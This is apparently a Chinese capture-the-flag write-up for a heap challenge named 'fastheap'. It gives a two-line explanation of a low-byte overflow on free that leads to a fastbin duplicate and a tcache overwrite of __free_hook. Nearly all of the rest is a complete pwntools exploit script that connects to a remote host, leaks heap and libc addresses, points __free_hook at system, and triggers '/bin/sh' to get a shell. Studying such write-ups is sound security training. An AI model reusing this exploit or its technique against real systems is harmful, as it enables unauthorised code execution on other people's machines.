[原创] 第九题:绝地逃生
2019-6-22 22:15 2411
1 free的时候存在低8位溢出。通过这个漏洞在fastbin里面加入重复chunk
2 tcache攻击,写freehook
from pwn import * #cn=process("./fastheap",shell=False) cn=remote("152.136.18.34",10000) base=0x555555554000 context.log_level='debug' def create(id,size,data): cn.sendlineafter(">>> ","1") cn.sendlineafter("ndex: ",str(id)) cn.sendlineafter("Size:",str(size)) cn.sendlineafter("ontents:",data) def show(id): cn.sendlineafter(">>> ", "3") cn.sendlineafter("ndex: ", str(id)) def delete(id1,id2,num): cn.sendlineafter(">>> ", "2") cn.sendlineafter("ndex range:",str(id1)+"-"+str(id2)) cn.sendlineafter("Number of workers:",str(num)) for i in range(255): if i == 3: create(i, 0x60, p64(0x71)*12) else: create(i,0x60,"s"*0x60) delete(251,255,7) create(255,0x60,"a"*0x60) create(254,0x60,"a"*0x60) create(253,0x60,"a"*0x60) create(252,0x60,"a"*0x60) create(251,0x60,"a"*0x60) delete(8,9,1) delete(0,1,1) show(255) heap_base=u64(cn.recv(6)+"\x00\x00")-0x5d0 heap_jump=heap_base+0x410 success(hex(heap_base)) delete(30,50,1) delete(6,7,1) delete(20,21,1) delete(253,254,1) for i in range(3): create(i+30,0x60,"s"*0x60) create(33,0x60,p64(heap_jump)*12) create(34,0x60,"s"*0x60) create(35,0x60,"s"*0x60) create(36,0x60,p64(0)+p64(0xe1)+"\n") delete(4,5,1) show(251) leak_addr=u64(cn.recv(6)+"\x00\x00") libc_baes=leak_addr-0x3ebca0 one_addr=libc_baes+0x4f2c5 jmp2_addr=leak_addr-0x8b-0x8 free_hook=libc_baes+0x3ed8e8 sys_addr=libc_baes+0x04f440 delete(5,6,1) delete(90,91,1) delete(252,253,1) create(37,0x60,p64(free_hook)*12) create(38,0x60,"s"*0x60) create(39,0x60,"s"*0x60) create(40,0x60,p64(sys_addr)+"\n") success(hex(free_hook)) #gdb.attach(cn,"set follow-fork-mode child\nb *"+hex(0x1109+base)+"\n b* "+hex(base+0xFC0)+"\n b *"+hex(base+0xEE0)) create(46,0x20,"/bin/sh\n") delete(46,47,1) cn.interactive()